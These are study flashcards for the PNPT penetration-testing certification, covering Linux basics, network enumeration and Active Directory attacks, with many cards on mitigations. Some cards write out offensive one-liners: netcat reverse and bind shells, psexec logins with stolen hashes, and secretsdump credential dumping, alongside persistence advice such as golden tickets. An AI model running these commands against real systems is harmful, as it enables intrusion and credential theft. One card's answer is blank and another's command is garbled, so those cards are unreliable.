PNPT Flashcards

1
Q

Linux File System: what is the /bin directory used for in Linux?

A

/bin is a directory which contains important executable programs and core OS commands

2
Q

Linux File System: what is the /boot directory used for in Linux?

A

this directory contains the files needed by the boot loader

3
Q

Linux File System: what is the /dev directory used for in Linux?

A

the /dev directory contains your device files

this directory will give you valuable info about what's connected to your system

4
Q

Linux file system: what is the /etc directory used for?

A

this contains the critical configuration files and startup scripts

5
Q

Linux File system: what is the purpose of the /home directory?

A

this is where users' home files are stored, similar to the Documents folder in Windows

6
Q

where are the users stored on a Linux system?

A

the users on a Linux machine are stored in /etc/passwd

7
Q

where are the passwords stored on a Linux machine?

A

/etc/shadow is where all the passwords are stored in Linux

8
Q

what command can we use to pull the users from the sudoers file who can use sudo?

A

grep 'sudo' /etc/group

9
Q

what are two ways we can list the IPs on a Linux system?

A

ip a
or
ifconfig

10
Q

how do we see the wireless connections on a Linux machine?

A

iwconfig

11
Q

how can we see the ARP entries on a machine?

A

arp -a
or
ip n

12
Q

how do we see the routing table on our PC?

A

route

13
Q

what command do we use to see open ports and services on a Linux machine?

A
14
Q

where on the web server are the files served by Apache stored?

A

/var/www/html

15
Q

how can we spin up a web server on the fly with Python?

A

python3 -m http.server 80

16
Q

what are the 5 stages of ethical hacking?

A
  1. Recon
  2. Scanning and Enumeration
  3. Gaining access
  4. Maintaining access
  5. Covering tracks
17
Q

how can we use the netdiscover command to discover other hosts on the network?

A

netdiscover -r 192.168.57.0/24

18
Q

what are some ways we can enumerate SMB?

A

SMB is a file share

We want to figure out the version of SMB running

The Metasploit module auxiliary/scanner/smb/smb_version is a good way of discovering the version of SMB running

Sometimes SMB will allow anonymous access, which lets us see files in the file share. We always want to check if there is anonymous access

We can check for anonymous SMB access with the smbclient command:
smbclient -L \\\\192.168.57.134\\

19
Q

what is a reverse shell ?

A

A reverse shell is when the victim connects to us: the target connects out and the attack box is listening

Most of the time we use reverse shells

20
Q

what is a bind shell?

A

With a bind shell a port is opened up on the target and we connect to it from our attack box

Most of the time we use reverse shells
Bind shells are usually used on an external assessment

21
Q

how do we create a reverse shell with netcat ?

A

Attacker: nc -nlvp 4444
Victim: nc <ip> 4444 -e /bin/bash

22
Q

how do we create a bind shell with netcat ?

A

Victim: nc -nvlp 4444 -e /bin/bash
Attacker: nc <ip> 4444

23
Q

what are non staged payloads ?

A
  • Sends the exploit shellcode all at once
    Larger in size and won't always work
24
Q

what are staged payloads ?

A
  • Sends payload in stages
    Can be less stable
25
Q

what is credential stuffing?

A

injecting breached account credentials in hopes of account takeover
26
Q

what is Active Directory?

A

- Directory service developed by Microsoft to manage Windows domain networks
- Stores information related to objects, such as computers, users, printers etc.
Think about it as a phone book for Windows
27
Q

what does AD use for authentication?

A

- Non-Windows devices such as Linux machines, firewalls, etc. can also authenticate to Active Directory via RADIUS or LDAP
28
Q

what is a domain controller?

A

a domain controller is a server with the AD DS server role installed that has specifically been promoted to a domain controller
29
Q

what are some of the features of domain controllers?

A

- Host a copy of the AD DS directory store
- Provide authentication and authorization services
- Replicate updates to other domain controllers in the domain and forest
- Allow administrative access to manage user accounts and network resources
30
Q

what is the AD DS data store?

A

the AD DS data store contains the database files and processes that store and manage directory information for users, services and applications
31
Q

what are some attributes of the AD DS data store?

A

- Consists of the NTDS.dit file
- Is stored by default in the %SystemRoot%\NTDS folder on all domain controllers
- Is accessible only through the domain controller processes and protocols
32
Q

what is the AD DS schema?

A

- Defines every type of object that can be stored in the directory
- Enforces rules regarding object creation and configuration
- Think of it as a blueprint
33
Q

what are some features of Active Directory domains?

A

- Domains are used to group and manage objects in the organization
- An administrative boundary for applying policies to groups of objects
- A replication boundary for replicating data between domain controllers
- An authentication and authorization boundary that provides a way to limit the scope of access to resources
34
Q

what are some characteristics of AD trees?

A

- A domain tree is a hierarchy of domains in AD DS
- All domains in the tree:
  ○ Share a contiguous namespace with the parent domain
  ○ Can have additional child domains
  ○ By default create a two-way transitive trust with other domains
- Parent domains and child domains look like subdomains
35
Q

what are some characteristics of AD OUs?

A

- OUs are Active Directory containers that contain users, groups, computers and other OUs
- Represent your organization hierarchically and logically
- Manage a collection of objects in a consistent way
- Delegate permissions to administer groups of objects
- Apply policies
36
Q

what are some characteristics of AD trusts?

A

Types of trusts:
- Directional: the trust direction flows from the trusting domain to the trusted domain
- Transitive: the trust relationship is extended beyond a two-domain trust to include other trusted domains; these can go tree to tree or forest to forest
- All domains in a forest trust all other domains in the forest
- Trusts can extend outside the forest
37
Q

what are some examples of AD objects?

A

- User: enables network resource access for a user
- InetOrgPerson: similar to a user account / used for compatibility with other directory services
- Contacts: used primarily to assign e-mail addresses to external users / does not enable network access
- Groups: used to simplify the administration of access control
- Computers: enables authentication and auditing of computer access to resources
- Printers: used to simplify the process of locating and connecting printers
- Shared Folders: enables users to search for shared folders based on properties
38
Q

what is LLMNR?

A

- Used to identify hosts when DNS fails to do so
- Previously NBT-NS
- The key flaw with LLMNR is that the service utilizes a user's username and NTLMv2 hash when appropriately responded to
39
Q

what are some of the mitigations for LLMNR poisoning?

A

- The best defense in this case is to disable LLMNR and NBT-NS
- To disable LLMNR select "Turn off multicast name resolution"
  ○ Under Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client in the group policy editor
- If a company must use or can't disable LLMNR/NBT-NS, the best course of action is to:
  ○ Require network access control
  ○ Require strong user passwords: the more complex and long the password, the harder it is to crack the hash
40
Q

what is an SMB relay attack?

A

- Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access
41
Q

what are the requirements for SMB signing?

A

- SMB signing must be disabled or not enforced on the target
- Relayed user credentials must be admin on a machine for any real value
42
Q

What are some of the SMB relay attack mitigations?

A

- Enable SMB signing on all devices
  ○ Pro: completely stops the attack
  ○ Con: can cause performance issues with file copies
- Disable NTLM authentication on the network
  ○ Pro: completely stops the attack
  ○ Con: if Kerberos stops working, Windows defaults back to NTLM
- Account tiering
  ○ Pro: limits domain admins to specific tasks
  ○ Con: enforcing the policy may be difficult
- Local admin restrictions
  ○ Pro: can prevent a lot of lateral movement
  ○ Con: potential increase in the amount of service desk tickets
43
Q

what are some ways we can get shells with user credentials?

A

We can gain a shell through Metasploit if we have the password:
use exploit/windows/smb/psexec

Gaining shell access with psexec.py with a password:
psexec.py domain/user:'Password'@IP

Through psexec.py with a hash:
psexec.py administrator@10.0.0.24 -hashes LM:NT
44
Q

explain IPv6 poisoning

A

IPv6 poisoning abuses the fact that Windows queries for an IPv6 address even in IPv4-only environments. If you do not use IPv6 internally, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via group policy. Disabling IPv6 entirely may have unintended consequences.
45
Q

what are some mitigations against IPv6 attacks?

A

- If WPAD is not in use internally, disable it via group policy and by disabling the WinHttpAutoProxySvc service
- Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding
- Consider adding administrative users to the Protected Users group or marking them as "Account is sensitive and cannot be delegated", which will prevent impersonation of that user via delegation
46
Q

what would our internal attack strategy be on an internal pentest?

A

- Begin the day with mitm6 and Responder
- Run scans to generate traffic: Nessus scans, vulnerability scans
- Look for websites in scope
- Look for default credentials on web logins
47
Q

what are pass attacks?

A

if we crack a password and/or can dump the SAM hashes, we can leverage both for lateral movement in our network. We can do pass attacks with hashes, not just passwords
48
Q

what hashes do pass the hash attacks work with?

A

pass the hash attacks only work with NTLMv1, not NTLMv2
49
Q

what is the point of lsass in a Windows environment?

A

lsass is responsible for enforcing the security policy on a system; it also stores credentials
50
Q

if we compromise an account and get a login somewhere, what is one of the first things we want to do?

A

if you get an account and get a login somewhere, you want to dump the secrets of that machine; secretsdump can be run with a password or a hash
51
Q

what are some of the juicy details we want to capture with secretsdump?

A

you want to capture the SAM hashes of administrators and users; we want to do a secretsdump on every machine we get access to
52
Q

what are some pass attack mitigations?

A

- Limit account re-use
  ○ Avoid re-using local admin passwords
  ○ Disable guest and administrator accounts
  ○ Limit who is a local admin
- Utilize stronger passwords
  ○ Avoid using common words
- PAM solution
53
Q

what are some mitigations for Kerberoasting?

A

- Strong passwords
- Least privilege: make sure service accounts are not domain admins
54
Q

what are tokens?

A

temporary keys that allow you access to a system/network without having to provide credentials each time you access a file; think cookies for computers
55
Q

what are the two types of tokens?

A

delegate and impersonate
56
Q

what are delegate tokens?

A

created for logging into a machine or using remote desktop / this is the most common type of token
57
Q

what are impersonate tokens?

A

impersonate tokens are non-interactive, such as attaching a network drive or a domain logon script
58
Q

what are the mitigations for token attacks?

A

- Limit user/group token creation permission
- Account tiering
- Local admin restriction
59
Q

what is the mimikatz tool used for?

A

Tool used to view and steal credentials, generate Kerberos tickets, and leverage attacks
60
Q

what attacks can mimikatz be used for?

A

- Credential dumping
- Pass the hash
- Over pass the hash
- Pass the ticket
- Silver ticket
- Golden ticket
61
Q

what should we do after compromising a user account?

A

- Search for quick wins
  ○ Kerberoasting
  ○ secretsdump
  ○ Pass the hash / pass the password
- Enumerate (BloodHound etc.)
  ○ Where does your account have access?
- Old vulnerabilities die hard
62
Q

what should we do after we own the domain?

A

- Provide as much value to your client as possible
  ○ Put your blinders on and do it again
  ○ Dump the NTDS.dit and crack passwords
  ○ Enumerate shares for sensitive info
- Persistence can be important
  ○ What happens if our DA account is lost?
  ○ Creating a DA account can be useful
  ○ Creating a golden ticket can be useful
63
Q

what is the NTDS.dit?

A

- A database used to store AD data; this data includes:
  ○ User information
  ○ Group information
  ○ Security descriptors
  ○ Password hashes
64
Q

what tool can we use to dump the NTDS.dit?

A

secretsdump.py /: ''@ -just-dc-ntlm
65
Q

what is a golden ticket attack?

A

What is it?
- When we compromise the krbtgt account we own the domain
- We can request access to any resource or system on the domain
- Golden ticket = complete access to every machine

Step 1. We can use mimikatz to carry out a golden ticket attack
Step 2. Once we have the SID and krbtgt hash, we can generate the golden ticket
Step 3. With a golden ticket we can now access other machines from the command line